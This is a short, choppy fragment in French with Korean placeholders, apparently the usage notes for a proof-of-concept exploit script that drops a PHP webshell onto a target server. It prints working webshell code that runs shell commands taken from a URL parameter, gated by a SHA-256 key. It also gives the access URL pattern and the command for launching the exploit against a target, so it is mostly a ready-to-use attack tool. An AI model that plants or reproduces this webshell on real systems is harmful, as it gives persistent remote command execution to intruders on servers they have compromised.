
Personnalisé pour mon propre usage
Personnalisé pour mon propre usage
?cmd=<명령어>Webshell avec authentification simple basée sur une clé (comparaison de hachage SHA-256)
L'exécution des commandes n'est possible qu'avec la bonne clé.
Modification de code requise :
drop_payload, modifier la partie YOUR_SECRET_KEY de la variable webshell avec la valeur de hachage SHA-256 de la clé souhaitée.Méthode d'utilisation :
YOUR_SECRET_KEY dans webshell par la valeur de hachage SHA-256 de la clé en clair.{target}/shell.php?k=<평문키>&c=<명령어>
Exemple :
echo -n test1234 | sha256sumcyberchef, etc.webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
python poc_noauth.py {타겟}